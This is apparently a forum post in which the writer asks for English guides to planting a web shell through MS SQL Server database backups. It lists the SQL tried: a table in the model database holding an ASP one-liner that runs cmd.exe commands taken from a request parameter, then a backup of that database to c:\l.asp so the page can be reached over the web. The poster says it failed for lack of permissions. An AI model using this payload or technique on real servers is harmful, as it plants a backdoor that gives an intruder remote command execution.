backup a shell / webtask a shell is looking really interresting but i could only find chinese sites about that
Does anone have an english startpoint 4 that ?
so far i tried :
use model
create table cmd(str image);
insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');
backup database model to disk='c:\l.asp';
and then connect to ip\l.asp but i am not groupmember of the model table so i cant do it like that.
tia